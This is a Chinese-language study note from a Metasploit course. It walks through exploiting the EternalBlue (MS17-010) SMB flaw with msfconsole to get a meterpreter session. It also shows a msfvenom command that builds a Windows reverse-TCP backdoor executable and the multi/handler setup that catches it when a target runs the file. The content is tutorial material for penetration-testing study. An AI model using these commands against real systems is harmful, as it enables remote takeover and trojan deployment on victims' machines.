前言
- 最近看到一个Metasploit学习课程,总共100个章节,计划一个月左右学习完成
Metasploit
- Metasploit是一个开源的渗透测试框架,用于评估和验证计算机系统的安全性。它提供了一系列的工具、模块和资源,使安全测试人员能够自动化执行各种渗透测试任务。Metasploit框架包括一个控制台界面和一个丰富的模块库,其中包含了各种漏洞利用、扫描和后渗透技术。
- Metasploit可用于发现和利用系统中的漏洞,以及进行远程代码执行、提权、持久性访问等攻击。它支持多种操作系统和网络协议,可以模拟各种攻击场景,并提供详细的报告和日志记录。
- 其目的是让复杂的漏洞攻击流程变得非常的简单
msf的使用
小知识:ctrl+shift + 切换字体大小
- 切换root用户
- sudo su
- 输入密码,默认为kali(密码不会显示)
- 打开msf
- msfconsole
msf攻击windows操作系统
-
永痕之蓝漏洞
- 是指微软Windows操作系统中存在的一个安全漏洞,该漏洞被命名为"EternalBlue"。这个漏洞是由美国国家安全局(NSA)开发的一种工具所导致的。
- 这个漏洞存在于Windows操作系统的SMB(Server Message Block)协议中,攻击者可以利用这个漏洞,通过发送恶意代码到目标计算机,远程执行恶意操作。攻击者可以在目标计算机上执行任意代码、获取敏感信息、传播恶意软件等。
-
search + 漏洞编号 查找漏洞
- search ms17_010 查找用永恒之蓝漏洞
- 查找结果有4个,包括两个攻击模块,两个辅助模块
-
使用模块方法
- use + 编号 或者 using 木块名
-
设置模块
-
查看当前模块设置
-
show options 或者 options
-
-
yes对应的为必须设置的内容
-
设置目标地址
- set RHOSTS 192.0.0.1
-
- 1为目标地址
- 2为kali地址
-
设置kali使用端口
- set lport 60000
-
攻击
- run
-
攻击完成之后,返回meterpreter,表示攻击完成后得到了目标机器的后渗透权限
-
background 退出
-
msf的使用
-
远控木马的生成
- msfvenom可以用来生成后门软件,在目标机上执行后门,在本地监听上线
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lpor=9999 -f.exe -o demo.exe
- 系统/架构/作用/方式 kali 0-65535 -o 输出文件 windows可执行文件名
-
exploit/multi/handler模块的使用
-
-
set payload windows/x64/meterpreter/reverse_tcp
-
set lhost 192.168.1.136
-
set lport 9999
-
run
-
-
上述参数设置应与远控木马的设置相同,当目标点击木马后既可以获取权限
-